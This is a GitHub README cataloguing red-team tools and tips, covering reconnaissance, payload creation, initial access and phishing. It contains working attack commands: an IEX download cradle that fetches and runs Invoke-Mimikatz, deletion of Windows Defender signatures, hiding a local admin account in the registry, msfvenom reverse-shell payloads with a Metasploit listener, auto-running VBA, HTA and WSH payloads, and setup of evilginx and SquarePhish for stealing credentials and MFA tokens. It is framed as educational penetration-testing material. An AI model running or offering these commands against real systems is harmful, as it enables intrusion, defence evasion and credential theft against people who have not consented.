Skip to content

Tools and Techniques for Red Team / Penetration Testing

Notifications You must be signed in to change notification settings

A-poc/RedTeam-Tools

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 
 
 
 
 

Repository files navigation

RedTeam-Tools

This github repository contains a collection of 130+ tools and resources that can be useful for red teaming activities.

Some of the tools may be specifically designed for red teaming, while others are more general-purpose and can be adapted for use in a red teaming context.

🔗 If you are a Blue Teamer, check out BlueTeam-Tools

Warning

The materials in this repository are for informational and educational purposes only. They are not intended for use in any illegal activities.

Note

Hide Tool List headings with the arrow.

Click 🔙 to get back to the list.

Tool List

Red Team Tips 17 tips
Reconnaissance 20 tools
Resource Development 11 tools
Initial Access 6 tools
Execution 13 tools
Persistence 4 tools
Privilege Escalation 10 tools
Defense Evasion 8 tools
    • Invoke-Obfuscation Script obfuscator
    • Veil Metasploit payload obfuscator
    • SharpBlock EDR bypass via entry point execution prevention
    • Alcatraz GUI x64 binary obfuscator
    • Mangle Compiled executable manipulation
    • AMSI Fail PowerShell snippets that break or disable AMSI
    • ScareCrow Payload creation framework designed around EDR bypass
    • moonwalk Linux system log and filesystem timestamp remover
Credential Access 11 tools
Discovery 6 tools
    • PCredz Credential discovery PCAP/live interface
    • PingCastle Active directory assessor
    • Seatbelt Local vulnerability scanner
    • ADRecon Active directory recon
    • adidnsdump Active Directory Integrated DNS dumping
    • scavenger Scanning tool for scavenging systems
Lateral Movement 12 tools
Collection 3 tools
    • BloodHound Active directory visualisation
    • Snaffler Active directory credential collector
    • linWinPwn Active Directory Enumeration and Vulnerability checks
Command and Control 9 tools
Exfiltration 5 tools
Impact 4 tools

Red Team Tips

Learn from Red Teamers with a collection of Red Teaming Tips. These tips cover a range of tactics, tools, and methodologies to improve your red teaming abilities.

Note: Nearly all tips are currently from @Alh4zr3d, he posts good Red Team Tips!

🔙Hiding the local admin account

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /t REG_DWORD /v alh4zr3d /d 0 /f

Description: 'Creating accounts is risky when evading blue, but when creating a local admin, use some cute sorcery in the registry to hide it.'

Credit: @Alh4zr3d

Link: Twitter

🔙Cripple windows defender by deleting signatures

"%Program Files%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

Description: 'A bit messy, but if Windows Defender is causing you a big headache, rather than disabling it (which alerts the user), you should just neuter it by deleting all the signatures.'

Credit: @Alh4zr3d

Link: Twitter

🔙Enable multiple RDP sessions per user

reg add HKLM\System\CurrentControlSet\Control\TerminalServer /v fSingleSessionPerUser /d 0 /f

Description: 'Sometimes you want to log in to a host via RDP or similar, but your user has an active session. Enable multiple sessions per user.'

Credit: @Alh4zr3d

Link: Twitter

🔙Sysinternals PsExec.exe local alternative

wmic.exe /node:10.1.1.1 /user:username /password:pass process call create cmd.exe /c " command "

Description: 'Are you tired of uploading Sysinternals PsExec.exe when doing lateral movement? Windows has a better alternative preinstalled. Try this instead.'

Credit: @GuhnooPlusLinux

Link: Twitter

🔙Live off the land port scanner

0..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect(<tgt_ip>,$_)) "Port $_ open"} 2>$null

Description: 'When possible, live off the land rather than uploading tools to machines (for many reasons). PowerShell/.NET help. Ex: simple port scanner in Powershell.'

Credit: @Alh4zr3d

Link: Twitter

🔙Proxy aware PowerShell DownloadString

$w=(New-Object Net.WebClient);$w.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;IEX $w.DownloadString("<url>")

Description: 'Most large orgs are using web proxies these days. The standard PowerShell download cradle is not proxy aware. Use this one.'

Credit: @Alh4zr3d

Link: Twitter

🔙Looking for internal endpoints in browser bookmarks

type "C:\Users\%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\Bookmarks.bak" | findstr /c "name url" | findstr /v "type"

Description: 'You'd be surprised what you can find out from a user's bookmarks alone. Internal endpoints they can access, for instance.'

Credit: @Alh4zr3d

Link: Twitter

🔙Query DNS records for enumeration

Get-DnsRecord -RecordType A -ZoneName FQDN -Server <server hostname>

Description: 'Enumeration is 95% of the game. However, launching tons of scans to evaluate the environment is very loud. Why not just ask the DC/DNS server for all DNS records?'

Credit: @Alh4zr3d

Link: Twitter

🔙Unquoted service paths without PowerUp

Get-CIMInstance -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name

Description: 'Finding unquoted service paths without PowerUp'

Credit: @Alh4zr3d

Link: Twitter

🔙Bypass a disabled command prompt with /k

# Win+R (To bring up Run Box)
cmd.exe /k "whoami"

Description: 'This command prompt has been disabled by your administrator...' Can usually be seen in environments such as kiosks PCs, a quick hacky work around is to use /k via the windows run box. This will carry out the command and then show the restriction message, allowing for command execution.

Credit: Martin Sohn Christensen

Link: Blog

🔙Stop windows defender deleting mimikatz.exe

(new-object net.webclient).downloadstring('https://raw.githubusercontent[.]com/BC-SECURITY/Empire/main/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1')|IEX;inv

Description: 'Are you tired of Windows Defender deleting mimikatz.exe? Try this instead.'

Credit: @GuhnooPlusLinux

Link: Twitter

🔙Check if you are in a virtual machine

reg query HKLM\SYSTEM /s | findstr /S "VirtualBox VBOX VMWare"

Description: 'Want to know if you are in a Virtual Machine? Query the registry Keys and find out!!! If any results show up then you are in a Virtual Machine.'

Credit: @dmcxblue

Link: Twitter

🔙Enumerate AppLocker rules

(Get-AppLockerPolicy -Local).RuleCollections

Get-ChildItem -Path HKLM:Software\Policies\Microsoft\Windows\SrpV2 -Recurse

reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2\Exe\

Description: 'AppLocker can be a pain. Enumerate to see how painful'

Credit: @Alh4zr3d

Link: Twitter

🔙CMD shortcut with 6 pixels via mspaint

image

  1. Open MSPaint.exe and set the canvas size to: Width=6 and Height=1 pixels
  2. Zoom in to make the following tasks easier
  3. Using the colour picker, set pixels values to (from left to right):
    • 1st: R: 10, G: 0, B: 0
    • 2nd: R: 13, G: 10, B: 13
    • 3rd: R: 100, G: 109, B: 99
    • 4th: R: 120, G: 101, B: 46
    • 5th: R: 0, G: 0, B: 101
    • 6th: R: 0, G: 0, B: 0
  4. Save it as 24-bit Bitmap (.bmp;.dib)
  5. Change its extension from bmp to bat and run.

Description: 'An unusual, yet effective method of gaining a shell by creating a shortcut to cmd.exe by drawing certain colours in Microsoft Paint. Due to the encoding algorithm used to write BMP files, it is possible to dictate ASCII data written into a file by carefully selecting certain RGB colours.'

Credit: PenTestPartners

Link: Blog

🔙Link spoofing with PreventDefault JavaScript method

image

<!DOCTYPE html>
<html>
  <head>
    <meta charset="UTF-8">
    <title>PreventDefault Example</title>
  </head>
  <body>
    <a href="https://google.com" onclick="event.preventDefault(); window.location.href = 'https://bing.com';">Go to Google</a>
  </body>
</html>

Description: Threat actors have been observed using this technique to trick victims into clicking spoofed in-page malware download links. Using the PreventDefault JavaScript method you can spoof the hover link to display a legit link google.com, but once clicked the victim will be redirected to your malicious link bing.com. Great for getting victims to download payloads via a controlled site.

Link: PreventDefault Docs

🔙Check SMB firewall rules with Responder

image

Copy-Item -Path "C:\tmp\" -Destination "\\<ip_running_responder>\c$"

Description: 'When I do a Compromise Assessment, I often ask the customer if I can do a last quick check: Copy-Item -Path "C:\tmp\" -Destination "\\<ip_running_responder>\c$". If Responder could capture the hash, the firewall allows outgoing SMB connections'

Credit: @malmoeb

Link: Twitter

🔙Disable AV with SysInternals PsSuspend

image

Description: Using the Microsoft Sysinternals tool PsSuspend.exe it's possible to suspend some AV service executables. The Microsoft signed tool can be passed the PID or Name of a running service, it will suspend the process via the NtSuspendProcess Windows API.

Related Blog Post: Bypassing AV via Process Suspension with PsSuspend.exe

Link: Twitter

Reconnaissance

🔙crt.sh -> httprobe -> EyeWitness

I have put together a bash one-liner that:

  • Passively collects a list of subdomains from certificate associations (crt.sh)
  • Actively requests each subdomain to verify it's existence (httprobe)
  • Actively screenshots each subdomain for manual review (EyeWitness)

Usage:

domain=DOMAIN_COM;rand=$RANDOM;curl -fsSL "https://crt.sh/?q=${domain}" | pup 'td text{}' | grep "${domain}" | sort -n | uniq | httprobe > /tmp/enum_tmp_${rand}.txt; python3 /usr/share/eyewitness/EyeWitness.py -f /tmp/enum_tmp_${rand}.txt --web

Note: You must have httprobe, pup and EyeWitness installed and change 'DOMAIN_COM' to the target domain. You are able to run this script concurrently in terminal windows if you have multiple target root domains

image

image

A JavaScript bookmarklet for extracting all webpage endpoint links on a page.

Created by @renniepak, this JavaScript code snippet can be used to extract all endpoints (starting with /) from the current webpage DOM including all external script sources embedded on the webpage.

javascript:(function(){var scripts=document.getElementsByTagName("script"),regex=/(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))/g;const results=new Set;for(var i=0;i<scripts.length;i++){var t=scripts[i].src;""!=t&&fetch(t).then(function(t){return t.text()}).then(function(t){var e=t.matchAll(regex);for(let r of e)results.add(r[0])}).catch(function(t){console.log("An error occurred: ",t)})}var pageContent=document.documentElement.outerHTML,matches=pageContent.matchAll(regex);for(const match of matches)results.add(match[0]);function writeResults(){results.forEach(function(t){document.write(t+"<br>")})}setTimeout(writeResults,3e3);})();

Usage (Bookmarklet)

Create a bookmarklet...

  • Right click your bookmark bar
  • Click 'Add Page'
  • Paste the above Javascript in the 'url' box
  • Click 'Save'

...then visit the victim page in the browser and click the bookmarklet.

image

Usage (Console)

Paste the above Javascript into the console window F12 and press enter.

image

Fast vulnerability scanner that uses .yaml templates to search for specific issues.

Install:

go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest

Usage:

cat domains.txt | nuclei -t /PATH/nuclei-templates/

image

certSniff is a Certificate Transparency logs keyword watcher I wrote in Python. It uses the certstream library to watch for certificate creation logs that contain keywords, defined in a file.

You can set this running with several keywords relating to your victim domain, any certificate creations will be recorded and may lead to the discovery of domains you were previously unaware of.

Install:

git clone https://github.com/A-poc/certSniff;cd certSniff/;pip install -r requirements.txt

Usage:

python3 certSniff.py -f example.txt

image

Nice tool for brute forcing file/folder paths on a victim website.

Install:

sudo apt install gobuster

Usage:

gobuster dir -u "https://google.com" -w /usr/share/wordlists/dirb/big.txt --wildcard -b 301,401,403,404,500 -t 20

image

A tool designed to perform Forced Browsing, an attack where the aim is to enumerate and access resources that are not referenced by the web application, but are still accessible by an attacker.

Feroxbuster uses brute force combined with a wordlist to search for unlinked content in target directories. These resources may store sensitive information about web applications and operational systems, such as source code, credentials, internal network addressing, etc...

Install: (Kali)

sudo apt update && sudo apt install -y feroxbuster

Install: (Mac)

curl -sL https://raw.githubusercontent.com/epi052/feroxbuster/master/install-nix.sh | bash

Install: (Windows)

Invoke-WebRequest https://github.com/epi052/feroxbuster/releases/latest/download/x86_64-windows-feroxbuster.exe.zip -OutFile feroxbuster.zip
Expand-Archive .\feroxbuster.zip
.\feroxbuster\feroxbuster.exe -V

For full installation instructions see here.

Usage:

# Add .pdf, .js, .html, .php, .txt, .json, and .docx to each url
./feroxbuster -u http://127.1 -x pdf -x js,html -x php txt json,docx

# Scan with headers
./feroxbuster -u http://127.1 -H Accept:application/json "Authorization: Bearer {token}"

# Read URLs from stdin
cat targets | ./feroxbuster --stdin --silent -s 200 301 302 --redirects -x js | fff -s 200 -o js-files

# Proxy requests through burpsuite
./feroxbuster -u http://127.1 --insecure --proxy http://127.0.0.1:8080

Full usage examples can be found here.

image

Image used from https://raw.githubusercontent.com/epi052/feroxbuster/main/img/demo.gif

A tool to find a company (target) infrastructure, files, and apps on the top cloud providers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode).

Features:

  • Cloud detection (IPINFO API and Source Code)
  • Fast (concurrent)
  • Cross Platform (windows, linux, mac)
  • User-Agent Randomization
  • Proxy Randomization (HTTP, Socks5)

Install:

Download the latest release for your system and follow the usage.

Usage:

# Specified target, generate keywords based off 'target', 80 threads with a timeout of 10, wordlist 'storage_small.txt'
CloudBrute -d target.com -k target -m storage -t 80 -T 10 -w "./data/storage_small.txt"

# Output results to file
CloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w -c amazon -o target_output.txt

image

Image used from https://github.com/0xsha/CloudBrute

dnsrecon is a pyhton tool for enumerating DNS records (MX, SOA, NS, A, AAAA, SPF and TXT) and can provide a number of new associated victim hosts to pivot into from a single domain search.

Install:

sudo apt install dnsrecon

Usage:

dnsrecon -d google.com

image

Shodan crawls public infrastructure and displays it in a searchable format. Using a company name, domain name, IP address it is possible to discover potentially vulnerable systems relating to your target via shodan.

image

Tool for enumerating subdomains, enumerating DNS, WAF detection, WHOIS, port scan, wayback machine, email harvesting.

Install:

git clone https://github.com/D3Ext/AORT; cd AORT; pip3 install -r requirements.txt

Usage:

python3 AORT.py -d google.com

image

A program that checks if a domain can be spoofed from. The program checks SPF and DMARC records for weak configurations that allow spoofing. Additionally it will alert if the domain has DMARC configuration that sends mail or HTTP requests on failed SPF/DKIM emails.

Domains are spoofable if any of the following conditions are met:

  • Lack of an SPF or DMARC record
  • SPF record never specifies ~all or -all
  • DMARC policy is set to p=none or is nonexistent

Install:

git clone https://github.com/BishopFox/spoofcheck; cd spoofcheck; pip install -r requirements.txt

Usage:

./spoofcheck.py [DOMAIN]

image

AWSBucketDump is a tool to quickly enumerate AWS S3 buckets to look for interesting files. It's similar to a subdomain bruteforcer but is made specifically for S3 buckets and also has some extra features that allow you to grep for files, as well as download interesting files.

Install:

git clone https://github.com/jordanpotti/AWSBucketDump; cd AWSBucketDump; pip install -r requirements.txt

Usage:

usage: AWSBucketDump.py [-h] [-D] [-t THREADS] -l HOSTLIST [-g GREPWORDS] [-m MAXSIZE]

optional arguments:
  -h, --help    show this help message and exit
  -D            Download files. This requires significant diskspace
  -d            If set to 1 or True, create directories for each host w/ results
  -t THREADS    number of threads
  -l HOSTLIST
  -g GREPWORDS  Provide a wordlist to grep for
  -m MAXSIZE    Maximum file size to download.

 python AWSBucketDump.py -l BucketNames.txt -g interesting_Keywords.txt -D -m 500000 -d 1

Nice tool for finding information from GitHub with regex, with the ability to search specific GitHub users and/or projects.

Install:

git clone https://github.com/metac0rtex/GitHarvester; cd GitHarvester

Usage:

./githarvester.py

TruffleHog is a tool that scans git repositories and looks for high-entropy strings and patterns that may indicate the presence of secrets, such as passwords and API keys. With TruffleHog, you can quickly and easily find sensitive information that may have been accidentally committed and pushed to a repository.

Install (Binaries): Link

Install (Go):

git clone https://github.com/trufflesecurity/trufflehog.git; cd trufflehog; go install

Usage:

trufflehog https://github.com/trufflesecurity/test_keys

image

Dismap is an asset discovery and identification tool. It can quickly identify protocols and fingerprint information such as web/tcp/udp, locate asset types, and is suitable for internal and external networks.

Dismap has a complete fingerprint rule base, currently including tcp/udp/tls protocol fingerprints and 4500+ web fingerprint rules, which can identify favicon, body, header, etc.

Install:

Dismap is a binary file for Linux, MacOS, and Windows. Go to Release to download the corresponding version to run:

# Linux or MacOS
chmod +x dismap-0.3-linux-amd64
./dismap-0.3-linux-amd64 -h

# Windows
dismap-0.3-windows-amd64.exe -h

Usage:

# Scan 192.168.1.1 subnet
./dismap -i 192.168.1.1/24

# Scan, output to result.txt and json output to result.json
./dismap -i 192.168.1.1/24 -o result.txt -j result.json

# Scan, Not use ICMP/PING to detect surviving hosts, timeout 10 seconds
./dismap -i 192.168.1.1/24 --np --timeout 10

# Scan, Number of concurrent threads 1000
./dismap -i 192.168.1.1/24 -t 1000

image

Image used from https://github.com/zhzyker/dismap

A tool for enumerating information from Windows and Samba systems.

It can be used to gather a wide range of information, including:

  • Domain and domain controller information
  • Local user and group information
  • Shares and share permissions
  • Security policies
  • Active Directory information

Install: (Apt)

sudo apt install enum4linux

Install: (Git)

git clone https://github.com/CiscoCXSecurity/enum4linux
cd enum4linux

Usage:

# 'Do everything'
enum4linux.pl -a 192.168.2.55

# Obtain list of usernames (RestrictAnonymous = 0)
enum4linux.pl -U 192.168.2.55

# Obtain list of usernames (using authentication)
enum4linux.pl -u administrator -p password -U 192.168.2.55

# Get a list of groups and their members
enum4linux.pl -G 192.168.2.55

# Verbose scan 
enum4linux.pl -v 192.168.2.55

Full usage information can be found in this blog.

image

Image used from https://allabouttesting.org/samba-enumeration-for-penetration-testing-short-tutorial/

Dangerously fast dns/network/port scanner, created by Esc4iCEscEsc, written in rust.

You will need a subdomains file. E.g. Subdomain wordlist by Sublist3r.

Install:

Download the latest release from here.

# Install a wordlist
sudo apt install wordlists
ls /usr/share/dirb/wordlists
ls /usr/share/amass/wordlists

Usage:

skanuvaty --target example.com --concurrency 16 --subdomains-file SUBDOMAIN_WORDLIST.txt

image

Image used from https://github.com/Esc4iCEscEsc/skanuvaty

Metabigor is Intelligence tool, its goal is to do OSINT tasks and more but without any API key.

Main Features:

  • Searching information about IP Address, ASN and Organization.
  • Wrapper for running rustscan, masscan and nmap more efficient on IP/CIDR.
  • Finding more related domains of the target by applying various techniques (certificate, whois, Google Analytics, etc).
  • Get Summary about IP address (powered by @thebl4ckturtle)

Install:

go install github.com/j3ssie/metabigor@latest

Usage:

# discovery IP of a company/organization
echo "company" | metabigor net --org -o /tmp/result.txt

# Getting more related domains by searching for certificate info
echo 'Target Inc' | metabigor cert --json | jq -r '.Domain' | unfurl format %r.%t | sort -u # this is old command

# Only run rustscan with full ports
echo '1.2.3.4/24' | metabigor scan -o result.txt

# Reverse Whois to find related domains
echo 'example.com' | metabigor related -s 'whois'

# Get Google Analytics ID directly from the URL
echo 'https://example.com' | metabigor related -s 'google-analytic'

image

Image used from https://github.com/j3ssie/metabigor

Gitrob is a tool to help find potentially sensitive files pushed to public repositories on Github.

Gitrob will clone repositories belonging to a user or organization down to a configurable depth and iterate through the commit history and flag files that match signatures for potentially sensitive files.

The findings will be presented through a web interface for easy browsing and analysis.

Note: Gitrob will need a Github access token in order to interact with the Github API. Create a personal access token and save it in an environment variable in your .bashrc or similar shell configuration file:

export GITROB_ACCESS_TOKEN=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef

Install: (Go)

go get github.com/michenriksen/gitrob

Install: (Binary)

A precompiled version is available for each release.

Usage:

# Run against org
gitrob {org_name}

# Saving session to a file
gitrob -save ~/gitrob-session.json acmecorp

# Loading session from a file
gitrob -load ~/gitrob-session.json

image

Image used from https://www.uedbox.com/post/58828/

Gowitness is a website screenshot utility written in Golang, that uses Chrome Headless to generate screenshots of web interfaces using the command line, with a handy report viewer to process results. Both Linux and macOS is supported, with Windows support mostly working.

Install: (Go)

go install github.com/sensepost/gowitness@latest

Full installation information can be found here.

Usage:

# Screenshot a single website
gowitness single https://www.google.com/

# Screenshot a cidr using 20 threads
gowitness scan --cidr 192.168.0.0/24 --threads 20

# Screenshot open http services from an namp file
gowitness nmap -f nmap.xml --open --service-contains http

# Run the report server
gowitness report serve

Full usage information can be found here.

image

Image used from https://github.com/sensepost/gowitness

Resource Development

Chimera is a PowerShell obfuscation script designed to bypass AMSI and antivirus solutions. It digests malicious PS1's known to trigger AV and uses string substitution and variable concatenation to evade common detection signatures.

Install:

sudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git
sudo git clone https://github.com/tokyoneon/chimera /opt/chimera
sudo chown $USER:$USER -R /opt/chimera/; cd /opt/chimera/
sudo chmod +x chimera.sh; ./chimera.sh --help

Usage:

./chimera.sh -f shells/Invoke-PowerShellTcp.ps1 -l 3 -o /tmp/chimera.ps1 -v -t powershell,windows,\
copyright -c -i -h -s length,get-location,ascii,stop,close,getstream -b new-object,reverse,\
invoke-expression,out-string,write-error -j -g -k -r -p

image

Msfvenom allows the creation of payloads for various operating systems in a wide range of formats. It also supports obfuscation of payloads for AV bypass.

Set Up Listener

use exploit/multi/handler 
set PAYLOAD windows/meterpreter/reverse_tcp 
set LHOST your-ip 
set LPORT listening-port 
run

Msfvenom Commands

PHP:

msfvenom -p php/meterpreter/reverse_tcp lhost =192.168.0.9 lport=1234 R

Windows:

msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe

Linux:

msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf

Java:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.jsp

HTA:

msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f hta-psh > shell.hta

image

Shellter is a dynamic shellcode injection tool, and the first truly dynamic PE infector ever created.

It can be used in order to inject shellcode into native Windows applications (currently 32-bit applications only).

Shellter takes advantage of the original structure of the PE file and doesn’t apply any modification such as changing memory access permissions in sections (unless the user wants), adding an extra section with RWE access, and whatever would look dodgy under an AV scan.

Full README information can be found here.

Install: (Kali)

apt-get update
apt-get install shellter

Install: (Windows)

Visit the download page and install.

Usage:

Just pick a legit binary to backdoor and run Shellter.

Some nice tips can be found here.

Lots of community usage demos can be found here.

image

Image used from https://www.kali.org/tools/shellter/images/shellter.png

Freeze is a payload creation tool used for circumventing EDR security controls to execute shellcode in a stealthy manner.

Freeze utilizes multiple techniques to not only remove Userland EDR hooks, but to also execute shellcode in such a way that it circumvents other endpoint monitoring controls.

Install:

git clone https://github.com/optiv/Freeze
cd Freeze
go build Freeze.go

Usage:

  -I string
        Path to the raw 64-bit shellcode.
  -O string
        Name of output file (e.g. loader.exe or loader.dll). Depending on what file extension defined will determine if Freeze makes a dll or exe.
  -console
        Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature.
  -encrypt
        Encrypts the shellcode using AES 256 encryption
  -export string
        For DLL Loaders Only - Specify a specific Export function for a loader to have.
  -process string
        The name of process to spawn. This process has to exist in C:\Windows\System32\. Example 'notepad.exe' (default "notepad.exe")
  -sandbox
        Enables sandbox evasion by checking:
                Is Endpoint joined to a domain?
                Does the Endpoint have more than 2 CPUs?
                Does the Endpoint have more than 4 gigs of RAM?
  -sha256
        Provides the SHA256 value of the loaders (This is useful for tracking)

image

Image used from https://www.blackhatethicalhacking.com/tools/freeze/

This script will create a Microsoft Word Document with a remote image, allowing for the capture of NTML hashes from a remote victim endpoint.

Microsoft Word has the ability to include images from remote locations, including a remote image hosted on an attacker controlled SMB server. This gives you the opportunity to listen for, and capture, NTLM hashes that are sent when an authenticated victim opens the Word document and renders the image.

Install:

git clone https://github.com/0x09AL/WordSteal
cd WordSteal

Usage:

# Generate document containing 'test.jpg' and start listener
./main.py 127.0.0.1 test.jpg 1

# Generate document containing 'test.jpg' and do not start listener
./main.py 127.0.0.1 test.jpg 0\n

image

Image used from https://pentestit.com/wordsteal-steal-ntlm-hashes-remotely/

This site provides information on undocumented Windows internals, system calls, data structures, and other low-level details of the Windows operating system.

It can be a valuable resource for individuals who want to explore the internals of Windows for various purposes, including vulnerability analysis, exploit development, and privilege escalation.

When developing exploits, understanding the internals of the target system is crucial. This site can help develop exploits by leveraging the low-level undocumented aspects of Windows.

Usage:

Visit http://undocumented.ntinternals.net/

image

Image used from http://undocumented.ntinternals.net/

This technical note provides a comprehensive list all the APIs exported by the Windows Kernel, for driver writes to register callback routines that are invoked by kernel components under various circumstances.

Most of these routines are documented in the Windows Driver Kit (WDK) but some of them are for use by in-box drivers.

The undocumented functions are described briefly whereas the documented ones are just listed here for reference.

Usage:

Visit https://codemachine.com/articles/kernel_callback_functions.html

image

Image used from https://codemachine.com

A collection of offensive techniques, scripts and useful links for achieving code execution and defense evasion via office macros.

Usage:

Visit https://github.com/S3cur3Th1sSh1t/OffensiveVBA#templates-in-this-repo

image

Image used from https://github.com/S3cur3Th1sSh1t

🔙WSH

Creating payload:

Set shell = WScript.CreateObject("Wscript.Shell")
shell.Run("C:\Windows\System32\calc.exe " & WScript.ScriptFullName),0,True

Execute:

wscript payload.vbs
cscript.exe payload.vbs
wscript /e:VBScript payload.txt //If .vbs files are blacklisted

🔙HTA

Creating payload:

<html>
<body>
<script>
	var c= 'cmd.exe'
	new ActiveXObject('WScript.Shell').Run(c);
</script>
</body>
</html>

Execute: Run file

🔙VBA

Creating payload:

Sub calc()
	Dim payload As String
	payload = "calc.exe"
	CreateObject("Wscript.Shell").Run payload,0
End Sub

Execute: Set function to Auto_Open() in macro enabled document

Initial Access

The Bash Bunny is a physical USB attack tool and multi-function payload delivery system. It is designed to be plugged into a computer's USB port and can be programmed to perform a variety of functions, including manipulating and exfiltrating data, installing malware, and bypassing security measures.

hackinglab: Bash Bunny – Guide

Hak5 Documentation

Nice Payload Repo

Product Page

image

evilginx2 + gophish. (GoPhish) Gophish is a powerful, open-source phishing framework that makes it easy to test your organization's exposure to phishing. (evilginx2) Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication

Install:

git clone https://github.com/fin3ss3g0d/evilgophish

Usage:

Usage:
./setup <root domain> <subdomain(s)> <root domain bool> <redirect url> <feed bool> <rid replacement> <blacklist bool>
 - root domain                     - the root domain to be used for the campaign
 - subdomains                      - a space separated list of evilginx2 subdomains, can be one if only one
 - root domain bool                - true or false to proxy root domain to evilginx2
 - redirect url                    - URL to redirect unauthorized Apache requests
 - feed bool                       - true or false if you plan to use the live feed
 - rid replacement                 - replace the gophish default "rid" in phishing URLs with this value
 - blacklist bool                  - true or false to use Apache blacklist
Example:
  ./setup.sh example.com "accounts myaccount" false https://redirect.com/ true user_id false

image

This framework is great for creating campaigns for initial access, 'SET has a number of custom attack vectors that allow you to make a believable attack quickly'.

Install:

git clone https://github.com/IO1337/social-engineering-toolkit; cd set; python setup.py install

Usage:

python3 setoolkit

image

Nice tool for logon brute force attacks. Can bf a number of services including SSH, FTP, TELNET, HTTP etc.

Install:

sudo apt install hydra

Usage:

hydra -L USER.TXT -P PASS.TXT 1.1.1.1 http-post-form "login.php:username-^USER^&password=^PASS^:Error"
hydra -L USER.TXT -P PASS.TXT 1.1.1.1 ssh

image

SquarePhish is an advanced phishing tool that uses a technique combining OAuth Device code authentication flow and QR codes (See PhishInSuits for more about OAuth Device Code flow for phishing attacks).

Attack Steps:

  • Send malicious QR code to victim
  • Victim scans QR code with mobile device
  • Victim directed to attacker controlled server (Triggering OAuth Device Code authentication flow process)
  • Victim emailed MFA code (Triggering OAuth Device Code flow 15 minute timer)
  • Attacker polls for authentication
  • Victim enters code into legit Microsoft website
  • Attacker saves authentication token

Install:

git clone https://github.com/secureworks/squarephish; cd squarephish; pip install -r requirements.txt

Note: Before using either module, update the required information in the settings.config file noted with Required.

Usage (Email Module):

usage: squish.py email [-h] [-c CONFIG] [--debug] [-e EMAIL]

optional arguments:
  -h, --help            show this help message and exit

  -c CONFIG, --config CONFIG
                        squarephish config file [Default: settings.config]

  --debug               enable server debugging

  -e EMAIL, --email EMAIL
                        victim email address to send initial QR code email to

Usage (Server Module):

usage: squish.py server [-h] [-c CONFIG] [--debug]

optional arguments:
  -h, --help            show this help message and exit

  -c CONFIG, --config CONFIG
                        squarephish config file [Default: settings.config]

  --debug               enable server debugging

image

King Phisher is a tool that allows attackers to create and send phishing emails to victims to obtain sensitive information.

It includes features like customizable templates, campaign management, and email sending capabilities, making it a powerful and easy-to-use tool for carrying out phishing attacks. With King Phisher, atackers can target individuals or organizations with targeted and convincing phishing emails, increasing the chances of success in their attacks.

Install (Linux - Client & Server):

wget -q https://github.com/securestate/king-phisher/raw/master/tools/install.sh && \
sudo bash